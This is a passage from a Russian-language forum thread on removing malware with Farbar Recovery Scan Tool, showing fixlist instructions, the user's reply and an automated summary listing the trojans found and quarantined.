2018-01-14 10:13 - 2018-01-14 10:13 - 000126464 _____ () C:\Users\nekit\AppData\Local\noah.dat
2018-02-09 15:43 - 2018-02-09 15:43 - 000000759 _____ () C:\Users\nekit\AppData\Local\uBar.lnk
2018-01-14 10:14 - 2018-01-14 10:14 - 001895384 _____ () C:\Users\nekit\AppData\Local\Vivasaotex.bin
Hosts:
Reboot:[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U], в FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
11.02.2018, 17:05
noob4321

Вложений: 1

вот файл
11.02.2018, 19:21
Vvvyg

Теперь можете удалить GRIZZLY Антивирус и установить нормальный.
11.02.2018, 19:31
CyberHelper

Итог лечения

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]2[/B][*]Обработано файлов: [B]4[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\windows\microsoft\svchost.exe - [B]Trojan.Win32.SelfDel.fzzy[/B][*] c:\windows\temp\g11cd.tmp.exe - [B]Trojan.Win32.Vehidis.xis[/B][*] \free mp3 turbashpack.dll._b862e9116a873b40abc4b39b11dac1a0351811f9 - [B]HEUR:Trojan.Win32.Generic[/B][/LIST][/LIST]